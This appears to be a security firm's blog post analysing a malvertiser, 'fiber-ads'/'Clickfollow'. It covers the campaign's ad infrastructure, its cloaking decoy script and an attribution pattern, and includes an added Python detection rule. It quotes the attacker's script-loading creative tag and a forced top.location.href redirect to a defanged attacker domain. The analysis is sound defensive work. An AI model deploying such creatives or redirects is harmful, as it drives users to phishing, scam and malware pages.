This blog post explores the techniques and tactics of a persistent malvertiser that operates under a company called “fiber-ads”. We provide an overview of the metrics behind their current and historic activity, a glimpse into their infrastructure, and some details around the impact from exposure to their campaigns.

A History Of High Profile Activity

In the last several months, there have been reports circulating on social media and tech news outlets around malvertisements surfacing through Windows 10 desktop applications. The first details around this activity were published by French security researcher and blogger Malekal:

Shortly after, the story was covered by Bleeping Computer:

While these incidents are unusual in that the ads are spawned outside the confines of a web browser, in-app advertisements are not the only delivery vehicle for this particular attacker. In fact, the application-based activity is likely just spillover from this bad actor's already active and disruptive malvertising campaigns on the open web.

Our goal is to augment the knowledge that has already been shared with the data that we have available from tracking and blocking this attacker on behalf of our publisher and platform clients.

Tactics, Techniques, & Procedures

This attacker has been seen on multiple platforms and exchanges. At the time the attacker first started getting notice from researchers and the media, the entry point was often the following domain:

ads.creative-serving.com

This is the ad serving domain for Platform161, which in this case is acting as the DSP (demand-side platform, the real-time ad buying side of the transaction).

Note: Platform161 is a victim here and not the perpetrator. We've since worked with them to identify and shut off the buyer. (More on that buyer later.)

The creatives are served with little to no variation; the only thing that changes is the intermediate ad serving domain, which the attacker churns through continuously. The attacker's creative tag does nothing more than load a script from that domain and drop what looks like an SSP cookie-sync pixel:

document.writeln("<script type=\"text\/javascript\" src=\"hxxps:\/\/www.yukongoldinfo.com\/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=[referreringdomain.com]\"><\/script>");document.writeln("<img src=\"hxxps:\/\/redacted\/sync?dsp_id=4&user_id=0285678c-12f2-4077-9988-48e816b3cb04&ssp=&expires=6&user_group=4&cb=440\" alt=\" \" style=\"display:none\"\/>");

The final script (a minified webpack-style module loader wrapping a single module):

!function(t) {
    // Minimal webpack runtime: resolve module r from the bundle t, caching in n
    function e(r) {
        if (n[r])
            return n[r].exports;
        var a = n[r] = {
            exports: {},
            id: r,
            loaded: !1
        };
        return t[r].call(a.exports, a, a.exports, e),
        a.loaded = !0,
        a.exports
    }
    var n = {};
    return e.m = t,
    e.c = n,
    e.p = "/min/",
    e(0)
}([function(t, e) {
    // Module 0: locate the loader's own <script> tag (the last one in the DOM)
    function n() {
        return document.getElementsByTagName("script")
    }
    // Build the decoy banner: a linked image hosted on the attacker's domain
    function r() {
        var t = document.createElement("div");
        return t.innerHTML = "<a target='_blank' href='hxxps://www.redacted.com/form/signup/freetrial-elf-v2/?d=70130000000EqoP'><img src='hxxps://www.yukongoldinfo.com/uploads/pictures/ab454.jpg' style=\"border:none;\" /> </a>",
        t
    }
    var a = n()
      , o = a[a.length - 1]
      , c = r();
    // Insert the decoy banner next to the script tag and do nothing else
    o.parentNode.appendChild(c)
}
]);

Of course this is a subterfuge, served only to impressions that do not pass the targeting criteria evaluated by the bad actor's ad serving domain(s). The code is designed to look like legitimate ad tech (a bundled module loader rendering a banner), but it does nothing more than render a fake creative so that the impression looks benign to anyone scanning the tag.

In the event the attacker decides to spawn an actual redirect, the user will have an experience much like the one outlined in the original Malekal report:

The evil payload is an all too familiar redirect:

top.location.href="hxxps://chanelets-aurning.com/a54334ea-7651-49b6-aa60-3b66ab1afbd3?dom=redacted&ub=adnexus";

Refresher - Malvertisers rely on forced redirections to drive victims to phishing pages, tech support scams, or drive-by downloads. The redirections fire without any user interaction: the creative simply sets top.location.href, navigating the entire publisher page (not just the ad frame) to the attacker's landing page.

The Attribution Model

Large scale malvertisers tend to leverage at least some automation in their infrastructure deployments, as they need to pivot often in order to maintain persistence. These folks are no different.

Let’s take a closer look at their ad serving endpoint(s):

hxxps://www.yukongoldinfo.com/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=[referreringdomain.com]

Fortunately, the automation chosen here provides an extremely reliable attribution formula. The ad serving PHP script is named after the first three letters of the domain (yukongoldinfo.com serves yuk.php), and it is consistently called with the same parameter set: `pic` (the decoy image), `pub`, `dom` (the publisher domain), `ub` (the buying platform) and `tre` (the referring domain).

Given this pattern, we are easily able to track this attacker's historic and future behavior. In 2019 alone so far, we have seen them churn through over 50 domains, all of which are registered at Namecheap. The complete list is available under Appendix A.
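The attribution formula above is simple enough to turn into a detection rule. The following is an added example, not code from the original post or from any of the platforms mentioned: it pulls every src URL out of a document.writeln creative tag (the tag shown earlier, with its defanged hxxps scheme and escaped slashes), and flags those whose script name equals the first three letters of the domain plus .php and whose query string carries the pic, pub, dom and ub parameters. The second-level-label extraction is a deliberate simplification (no public suffix list), and the extra positive and negative URLs at the bottom are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The creative tag as shown on the page (escaped slashes/quotes, defanged scheme).
CREATIVE_TAG = r'''document.writeln("<script type=\"text\/javascript\" src=\"hxxps:\/\/www.yukongoldinfo.com\/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=[referreringdomain.com]\"><\/script>");document.writeln("<img src=\"hxxps:\/\/redacted\/sync?dsp_id=4&user_id=0285678c-12f2-4077-9988-48e816b3cb04&ssp=&expires=6&user_group=4&cb=440\" alt=\" \" style=\"display:none\"\/>");'''

# Parameters the attacker's script is consistently called with (tre is optional here).
REQUIRED_PARAMS = {"pic", "pub", "dom", "ub"}

SRC_RE = re.compile(r'src="((?:hxxp|http)s?://[^"\s]+)"', re.I)


def unescape_tag(tag: str) -> str:
    """Undo the JavaScript string escaping used inside document.writeln("...")."""
    return tag.replace(r"\/", "/").replace(r"\"", '"')


def extract_src_urls(tag: str) -> list:
    """Return every src="..." URL in a creative tag, in document order."""
    return SRC_RE.findall(unescape_tag(tag))


def refang(url: str) -> str:
    """Turn a defanged hxxp(s):// URL back into http(s):// so urlsplit parses it."""
    return re.sub(r"^hxxp", "http", url, flags=re.I)


def registrable_label(host: str) -> str:
    """Crude second-level label: drop a leading www. and the last label (TLD).
    Simplification for the example; a real rule would use the public suffix list."""
    host = host.lower()
    if host.startswith("www."):
        host = host[4:]
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def matches_attribution(url: str) -> bool:
    """True if the URL follows the fiber-ads pattern: <first3>.php on <first3...>.tld
    with the pic/pub/dom/ub parameters present."""
    parts = urlsplit(refang(url))
    if not parts.hostname:
        return False
    label = registrable_label(parts.hostname)
    script = parts.path.rsplit("/", 1)[-1]
    if len(label) < 3 or script != label[:3] + ".php":
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    return REQUIRED_PARAMS.issubset(params)


def scan_creative(tag: str) -> list:
    """Return the URLs inside a creative tag that match the attribution pattern."""
    return [u for u in extract_src_urls(tag) if matches_attribution(u)]


# Constructed URLs (not observed infrastructure) showing the rule generalising:
# a hypothetical new domain following the pattern, and two near-misses.
CONSTRUCTED_HIT = "hxxps://www.example-serving.test/exa.php?pic=x1.jpg&pub=exam&dom=site.test&ub=openx&tre=ref.test"
CONSTRUCTED_MISS_SCRIPT = "hxxps://www.yukongoldinfo.com/sync.php?pic=ab454.jpg&pub=yukg&dom=site.test&ub=openx"
CONSTRUCTED_MISS_PARAMS = "hxxps://www.yukongoldinfo.com/yuk.php?dsp_id=4&user_id=abc"

if __name__ == "__main__":
    for hit in scan_creative(CREATIVE_TAG):
        print("creative tag hit:", hit)
    for u in (CONSTRUCTED_HIT, CONSTRUCTED_MISS_SCRIPT, CONSTRUCTED_MISS_PARAMS):
        print(matches_attribution(u), u)
```

The rule keys on structure rather than on any one domain, which is the point of an attribution model: a newly registered domain on a fresh platform still matches on its first impression, and the pixel URL in the same tag (different host, no script-name relationship, no pic/pub/dom/ub) is left alone.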

Malvertising activity that fits this MO can be traced back through over 100 additional domains, going all the way back to 2017.

New ad serving domains from this malvertiser continue to surface on a weekly basis across varying platforms.

The Business Model

In March 2019, we were fortunate to receive some feedback from one of our platform customers regarding a campaign that fit the attribution model for this attacker. We were told that the buyer, "fiber-ads", had been active since January 2019.

We were able to confirm this exact buyer with multiple platform partners as well. We were also told that they had recently pivoted to a new corporate identity, "Clickfollow".

Both companies are based out of Hong Kong:

clickfollow.com